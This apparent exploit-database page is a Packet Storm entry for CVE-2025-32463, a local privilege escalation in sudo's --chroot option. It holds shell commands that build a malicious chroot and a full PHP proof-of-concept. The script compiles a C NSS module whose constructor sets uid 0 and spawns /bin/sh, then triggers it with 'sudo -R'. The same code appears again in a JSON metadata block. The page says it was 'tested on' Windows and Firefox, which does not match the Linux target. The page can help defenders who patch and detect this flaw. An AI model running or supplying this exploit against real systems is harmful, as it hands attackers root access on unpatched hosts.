📄 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157

9.3 / 10

CRITICAL

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

sudo version 1.9.17 local privilege escalation proof of concept exploit that leverages NSS module loading...

Visit Original Source

Basic Information

ID PACKETSTORM:212157

Published Nov 27, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : sudo 1.9.17 local Privilege Escalation via Sudo Chroot NSS Module Loading |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.sudo.ws/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/212006/ & CVE-2025-32463

[+] Summary :

CVE-2025-32463 is a local privilege escalation vulnerability in Sudo that allows attackers to execute arbitrary code as root
by exploiting the NSS (Name Service Switch) module loading mechanism within a chroot environment.
The vulnerability occurs when sudo's --chroot option loads malicious NSS modules from the chroot environment.

The vulnerability exists in sudo's handling of NSS modules when using the --chroot option. When sudo executes a command within a chroot environment, it may load NSS modules from the chroot's library directories rather than the host system. An attacker with local access can create a malicious chroot environment with a crafted NSS module that executes arbitrary code when loaded.

[+] Technical Analysis :

**Vulnerability Mechanism:**

1. Attacker creates a chroot environment with malicious NSS configuration
2. The nsswitch.conf inside chroot points to a malicious NSS module
3. When sudo --chroot is executed, it loads the malicious module
4. The module's constructor function executes with root privileges

**Key Vulnerable Components:**

- Sudo's chroot implementation
- NSS module loading mechanism
- Dynamic linker behavior in chroot

[+] Attack Flow :

1. **Create Malicious Chroot Structure**

mkdir -p chtoot/{lib,etc}

2. **Write Malicious nsswitch.conf**

echo "passwd: Xfiles" > chtoot/etc/nsswitch.conf
echo "group: files" >> chtoot/etc/nsswitch.conf
echo "shadow: files" >> chtoot/etc/nsswitch.conf

[+] Usage: php poc.php

[+] POC :

<?php
/**
* PoC for CVE-2025-32463: Local privilege escalation via sudo --chroot
* PHP version of the Python exploit
*
* Use in lab environments only. Do not run on production systems.
*/

class SudoChrootExploit {
private $chroot = "./chtoot";
private $libDir;
private $etcDir;
private $payloadC = "payload.c";
private $libName = "libnss_Xfiles.so.2";
private $payloadSo;
private $nsswitch;
private $verbose = false;

public function __construct($verbose = false) {
$this->verbose = $verbose;
$this->libDir = $this->chroot . "/lib";
$this->etcDir = $this->chroot . "/etc";
$this->payloadSo = $this->libDir . "/" . $this->libName;
$this->nsswitch = $this->etcDir . "/nsswitch.conf";
}

private function log($msg) {
if ($this->verbose) {
echo "[*] " . $msg . PHP_EOL;
}
}

private function setupChroot() {
echo "[+] Setting up chroot directories..." . PHP_EOL;

if (!is_dir($this->libDir)) {
mkdir($this->libDir, 0755, true);
$this->log("Created directory: " . $this->libDir);
}

if (!is_dir($this->etcDir)) {
mkdir($this->etcDir, 0755, true);
$this->log("Created directory: " . $this->etcDir);
}

$this->log("Chroot structure created successfully");
}

private function writeNsswitch() {
echo "[+] Writing fake nsswitch.conf..." . PHP_EOL;

$nsswitchContent = "passwd: Xfiles\n" .
"group: files\n" .
"shadow: files\n";

if (file_put_contents($this->nsswitch, $nsswitchContent) === false) {
throw new Exception("Failed to write nsswitch.conf");
}

$this->log("Written malicious nsswitch.conf to " . $this->nsswitch);
}

private function writePayload() {
echo "[+] Writing payload source..." . PHP_EOL;

$payloadCode = '
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <nss.h>
#include <pwd.h>

__attribute__((constructor)) void init() {
unsetenv("LD_PRELOAD");
setuid(0);
setgid(0);
system("/bin/sh");
}

enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,
char *buf, size_t buflen, int *errnop) {
return NSS_STATUS_NOTFOUND;
}
';

if (file_put_contents($this->payloadC, $payloadCode) === false) {
throw new Exception("Failed to write payload source");
}

$this->log("Written C payload to " . $this->payloadC);
}

private function compilePayload() {
echo "[+] Compiling malicious libnss module..." . PHP_EOL;

$compileCmd = "gcc -fPIC -shared -o " .
escapeshellarg($this->payloadSo) . " " .
escapeshellarg($this->payloadC) . " -nostartfiles";

$this->log("Compilation command: " . $compileCmd);

$output = [];
$returnCode = 0;
exec($compileCmd . " 2>&1", $output, $returnCode);

if ($returnCode !== 0) {
throw new Exception("Compilation failed: " . implode("\n", $output));
}

if (!file_exists($this->payloadSo)) {
throw new Exception("Compiled library not found: " . $this->payloadSo);
}

$this->log("Successfully compiled shared object to " . $this->payloadSo);
}

private function cleanup() {
echo "[+] Cleaning up payload source..." . PHP_EOL;

if (file_exists($this->payloadC)) {
if (unlink($this->payloadC)) {
$this->log("Removed " . $this->payloadC);
} else {
echo "[!] Warning: Failed to remove " . $this->payloadC . PHP_EOL;
}
}
}

private function runExploit() {
echo "[+] Launching sudo with chroot to trigger exploit..." . PHP_EOL;

$sudoCmd = "sudo -R " . escapeshellarg($this->chroot) . " id";
$this->log("Executing: " . $sudoCmd);

// Method 1: Using system()
echo "[*] Attempting exploit via system()..." . PHP_EOL;
system($sudoCmd, $returnCode);

if ($returnCode !== 0) {
// Method 2: Using exec with output
echo "[*] Attempting exploit via exec()..." . PHP_EOL;
$output = [];
exec($sudoCmd, $output, $returnCode);

if (!empty($output)) {
echo "[*] Command output:" . PHP_EOL;
foreach ($output as $line) {
echo " " . $line . PHP_EOL;
}
}

if ($returnCode !== 0) {
echo "[!] Exploit may have failed. Return code: " . $returnCode . PHP_EOL;
echo "[!] Check if sudo allows chroot and if gcc is installed" . PHP_EOL;
}
}
}

private function checkDependencies() {
echo "[+] Checking dependencies..." . PHP_EOL;

$dependencies = [
'sudo' => 'sudo --version',
'gcc' => 'gcc --version',
];

foreach ($dependencies as $name => $cmd) {
$output = [];
$returnCode = 0;
exec($cmd . " 2>/dev/null", $output, $returnCode);

if ($returnCode === 0) {
$this->log("✓ $name is available");
} else {
throw new Exception("✗ $name is not available or not in PATH");
}
}

$this->log("All dependencies satisfied");
}

private function showInfo() {
echo "=== CVE-2025-32463 Exploit Information ===" . PHP_EOL;
echo "Vulnerability: Local privilege escalation via sudo --chroot" . PHP_EOL;
echo "Mechanism: Malicious NSS module loading in chroot environment" . PHP_EOL;
echo "Target: sudo versions with chroot capability" . PHP_EOL;
echo "Effect: Potential root shell execution" . PHP_EOL;
echo "==========================================" . PHP_EOL . PHP_EOL;
}

public function run() {
try {
$this->showInfo();
$this->checkDependencies();
$this->setupChroot();
$this->writeNsswitch();
$this->writePayload();
$this->compilePayload();
$this->cleanup();
$this->runExploit();

echo PHP_EOL . "[+] Exploit sequence completed." . PHP_EOL;

} catch (Exception $e) {
echo "[!] Error: " . $e->getMessage() . PHP_EOL;
echo "[!] Exploit failed." . PHP_EOL;
exit(1);
}
}

public function __destruct() {
// Additional cleanup if needed
if (file_exists($this->payloadC)) {
unlink($this->payloadC);
}
}
}

// Command line argument parsing
function parseArgs() {
$options = getopt("v", ["verbose", "help"]);

if (isset($options['help'])) {
echo "Usage: php " . basename(__FILE__) . " [OPTIONS]" . PHP_EOL . PHP_EOL;
echo "Options:" . PHP_EOL;
echo " -v, --verbose Enable verbose output for debugging" . PHP_EOL;
echo " --help Show this help message" . PHP_EOL . PHP_EOL;
echo "Description:" . PHP_EOL;
echo " Proof-of-Concept for CVE-2025-32463: Local privilege escalation" . PHP_EOL;
echo " via sudo --chroot using malicious NSS modules." . PHP_EOL . PHP_EOL;
echo "Warning:" . PHP_EOL;
echo " Use in lab environments only. Do not run on production systems." . PHP_EOL;
exit(0);
}

return [
'verbose' => isset($options['v']) || isset($options['verbose'])
];
}

// Main execution
if (php_sapi_name() === 'cli') {
$args = parseArgs();
$exploit = new SudoChrootExploit($args['verbose']);
$exploit->run();
} else {
echo "This script must be run from the command line." . PHP_EOL;
exit(1);
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-27T18:33:39",
    "description": "sudo version 1.9.17 local privilege escalation proof of concept exploit that leverages NSS module loading...",
    "published": "2025-11-27T00:00:00",
    "modified": "2025-11-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212157",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-32463"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : sudo 1.9.17 local Privilege Escalation via Sudo Chroot NSS Module Loading                                                   |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.sudo.ws/                                                                                                        |\n    =============================================================================================================================================\n    \n    POC : \n    \n    [+] References : https://packetstorm.news/files/id/212006/ & \tCVE-2025-32463\n    \n    \n    [+] Summary :\n    \n    CVE-2025-32463 is a local privilege escalation vulnerability in Sudo that allows attackers to execute arbitrary code as root \n    by exploiting the NSS (Name Service Switch) module loading mechanism within a chroot environment. \n    The vulnerability occurs when sudo's --chroot option loads malicious NSS modules from the chroot environment.\n    \n    The vulnerability exists in sudo's handling of NSS modules when using the --chroot option. When sudo executes a command within a chroot environment, it may load NSS modules from the chroot's library directories rather than the host system. An attacker with local access can create a malicious chroot environment with a crafted NSS module that executes arbitrary code when loaded.\n    \n    [+] Technical Analysis :\n    \n    **Vulnerability Mechanism:**\n    \n    1. Attacker creates a chroot environment with malicious NSS configuration\n    2. The nsswitch.conf inside chroot points to a malicious NSS module\n    3. When sudo --chroot is executed, it loads the malicious module\n    4. The module's constructor function executes with root privileges\n    \n    **Key Vulnerable Components:**\n    \n    - Sudo's chroot implementation\n    - NSS module loading mechanism\n    - Dynamic linker behavior in chroot\n    \n    [+] Attack Flow :\n    \n    1. **Create Malicious Chroot Structure**\n    \n    mkdir -p chtoot/{lib,etc}\n    \n    \n    2. **Write Malicious nsswitch.conf**\n    \n    echo \"passwd: Xfiles\" > chtoot/etc/nsswitch.conf\n    echo \"group: files\" >> chtoot/etc/nsswitch.conf\n    echo \"shadow: files\" >> chtoot/etc/nsswitch.conf\n    \n    \n    [+] Usage: php poc.php\n    \n    [+] POC :\n    \n    <?php\n    /**\n     * PoC for CVE-2025-32463: Local privilege escalation via sudo --chroot\n     * PHP version of the Python exploit\n     * \n     * Use in lab environments only. Do not run on production systems.\n     */\n    \n    class SudoChrootExploit {\n        private $chroot = \"./chtoot\";\n        private $libDir;\n        private $etcDir;\n        private $payloadC = \"payload.c\";\n        private $libName = \"libnss_Xfiles.so.2\";\n        private $payloadSo;\n        private $nsswitch;\n        private $verbose = false;\n        \n        public function __construct($verbose = false) {\n            $this->verbose = $verbose;\n            $this->libDir = $this->chroot . \"/lib\";\n            $this->etcDir = $this->chroot . \"/etc\";\n            $this->payloadSo = $this->libDir . \"/\" . $this->libName;\n            $this->nsswitch = $this->etcDir . \"/nsswitch.conf\";\n        }\n        \n        private function log($msg) {\n            if ($this->verbose) {\n                echo \"[*] \" . $msg . PHP_EOL;\n            }\n        }\n        \n        private function setupChroot() {\n            echo \"[+] Setting up chroot directories...\" . PHP_EOL;\n            \n            if (!is_dir($this->libDir)) {\n                mkdir($this->libDir, 0755, true);\n                $this->log(\"Created directory: \" . $this->libDir);\n            }\n            \n            if (!is_dir($this->etcDir)) {\n                mkdir($this->etcDir, 0755, true);\n                $this->log(\"Created directory: \" . $this->etcDir);\n            }\n            \n            $this->log(\"Chroot structure created successfully\");\n        }\n        \n        private function writeNsswitch() {\n            echo \"[+] Writing fake nsswitch.conf...\" . PHP_EOL;\n            \n            $nsswitchContent = \"passwd: Xfiles\\n\" .\n                              \"group:  files\\n\" .\n                              \"shadow: files\\n\";\n            \n            if (file_put_contents($this->nsswitch, $nsswitchContent) === false) {\n                throw new Exception(\"Failed to write nsswitch.conf\");\n            }\n            \n            $this->log(\"Written malicious nsswitch.conf to \" . $this->nsswitch);\n        }\n        \n        private function writePayload() {\n            echo \"[+] Writing payload source...\" . PHP_EOL;\n            \n            $payloadCode = '\n    #include <stdio.h>\n    #include <stdlib.h>\n    #include <unistd.h>\n    #include <nss.h>\n    #include <pwd.h>\n    \n    __attribute__((constructor)) void init() {\n        unsetenv(\"LD_PRELOAD\");\n        setuid(0);\n        setgid(0);\n        system(\"/bin/sh\");\n    }\n    \n    enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,\n                                           char *buf, size_t buflen, int *errnop) {\n        return NSS_STATUS_NOTFOUND;\n    }\n    ';\n            \n            if (file_put_contents($this->payloadC, $payloadCode) === false) {\n                throw new Exception(\"Failed to write payload source\");\n            }\n            \n            $this->log(\"Written C payload to \" . $this->payloadC);\n        }\n        \n        private function compilePayload() {\n            echo \"[+] Compiling malicious libnss module...\" . PHP_EOL;\n            \n            $compileCmd = \"gcc -fPIC -shared -o \" . \n                          escapeshellarg($this->payloadSo) . \" \" .\n                          escapeshellarg($this->payloadC) . \" -nostartfiles\";\n            \n            $this->log(\"Compilation command: \" . $compileCmd);\n            \n            $output = [];\n            $returnCode = 0;\n            exec($compileCmd . \" 2>&1\", $output, $returnCode);\n            \n            if ($returnCode !== 0) {\n                throw new Exception(\"Compilation failed: \" . implode(\"\\n\", $output));\n            }\n            \n            if (!file_exists($this->payloadSo)) {\n                throw new Exception(\"Compiled library not found: \" . $this->payloadSo);\n            }\n            \n            $this->log(\"Successfully compiled shared object to \" . $this->payloadSo);\n        }\n        \n        private function cleanup() {\n            echo \"[+] Cleaning up payload source...\" . PHP_EOL;\n            \n            if (file_exists($this->payloadC)) {\n                if (unlink($this->payloadC)) {\n                    $this->log(\"Removed \" . $this->payloadC);\n                } else {\n                    echo \"[!] Warning: Failed to remove \" . $this->payloadC . PHP_EOL;\n                }\n            }\n        }\n        \n        private function runExploit() {\n            echo \"[+] Launching sudo with chroot to trigger exploit...\" . PHP_EOL;\n            \n            $sudoCmd = \"sudo -R \" . escapeshellarg($this->chroot) . \" id\";\n            $this->log(\"Executing: \" . $sudoCmd);\n            \n            // Method 1: Using system()\n            echo \"[*] Attempting exploit via system()...\" . PHP_EOL;\n            system($sudoCmd, $returnCode);\n            \n            if ($returnCode !== 0) {\n                // Method 2: Using exec with output\n                echo \"[*] Attempting exploit via exec()...\" . PHP_EOL;\n                $output = [];\n                exec($sudoCmd, $output, $returnCode);\n                \n                if (!empty($output)) {\n                    echo \"[*] Command output:\" . PHP_EOL;\n                    foreach ($output as $line) {\n                        echo \"    \" . $line . PHP_EOL;\n                    }\n                }\n                \n                if ($returnCode !== 0) {\n                    echo \"[!] Exploit may have failed. Return code: \" . $returnCode . PHP_EOL;\n                    echo \"[!] Check if sudo allows chroot and if gcc is installed\" . PHP_EOL;\n                }\n            }\n        }\n        \n        private function checkDependencies() {\n            echo \"[+] Checking dependencies...\" . PHP_EOL;\n            \n            $dependencies = [\n                'sudo' => 'sudo --version',\n                'gcc' => 'gcc --version',\n            ];\n            \n            foreach ($dependencies as $name => $cmd) {\n                $output = [];\n                $returnCode = 0;\n                exec($cmd . \" 2>/dev/null\", $output, $returnCode);\n                \n                if ($returnCode === 0) {\n                    $this->log(\"\u2713 $name is available\");\n                } else {\n                    throw new Exception(\"\u2717 $name is not available or not in PATH\");\n                }\n            }\n            \n            $this->log(\"All dependencies satisfied\");\n        }\n        \n        private function showInfo() {\n            echo \"=== CVE-2025-32463 Exploit Information ===\" . PHP_EOL;\n            echo \"Vulnerability: Local privilege escalation via sudo --chroot\" . PHP_EOL;\n            echo \"Mechanism: Malicious NSS module loading in chroot environment\" . PHP_EOL;\n            echo \"Target: sudo versions with chroot capability\" . PHP_EOL;\n            echo \"Effect: Potential root shell execution\" . PHP_EOL;\n            echo \"==========================================\" . PHP_EOL . PHP_EOL;\n        }\n        \n        public function run() {\n            try {\n                $this->showInfo();\n                $this->checkDependencies();\n                $this->setupChroot();\n                $this->writeNsswitch();\n                $this->writePayload();\n                $this->compilePayload();\n                $this->cleanup();\n                $this->runExploit();\n                \n                echo PHP_EOL . \"[+] Exploit sequence completed.\" . PHP_EOL;\n                \n            } catch (Exception $e) {\n                echo \"[!] Error: \" . $e->getMessage() . PHP_EOL;\n                echo \"[!] Exploit failed.\" . PHP_EOL;\n                exit(1);\n            }\n        }\n        \n        public function __destruct() {\n            // Additional cleanup if needed\n            if (file_exists($this->payloadC)) {\n                unlink($this->payloadC);\n            }\n        }\n    }\n    \n    // Command line argument parsing\n    function parseArgs() {\n        $options = getopt(\"v\", [\"verbose\", \"help\"]);\n        \n        if (isset($options['help'])) {\n            echo \"Usage: php \" . basename(__FILE__) . \" [OPTIONS]\" . PHP_EOL . PHP_EOL;\n            echo \"Options:\" . PHP_EOL;\n            echo \"  -v, --verbose  Enable verbose output for debugging\" . PHP_EOL;\n            echo \"      --help     Show this help message\" . PHP_EOL . PHP_EOL;\n            echo \"Description:\" . PHP_EOL;\n            echo \"  Proof-of-Concept for CVE-2025-32463: Local privilege escalation\" . PHP_EOL;\n            echo \"  via sudo --chroot using malicious NSS modules.\" . PHP_EOL . PHP_EOL;\n            echo \"Warning:\" . PHP_EOL;\n            echo \"  Use in lab environments only. Do not run on production systems.\" . PHP_EOL;\n            exit(0);\n        }\n        \n        return [\n            'verbose' => isset($options['v']) || isset($options['verbose'])\n        ];\n    }\n    \n    // Main execution\n    if (php_sapi_name() === 'cli') {\n        $args = parseArgs();\n        $exploit = new SudoChrootExploit($args['verbose']);\n        $exploit->run();\n    } else {\n        echo \"This script must be run from the command line.\" . PHP_EOL;\n        exit(1);\n    }\n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212157",
    "cvss": {
        "score": 9.3,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212157/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply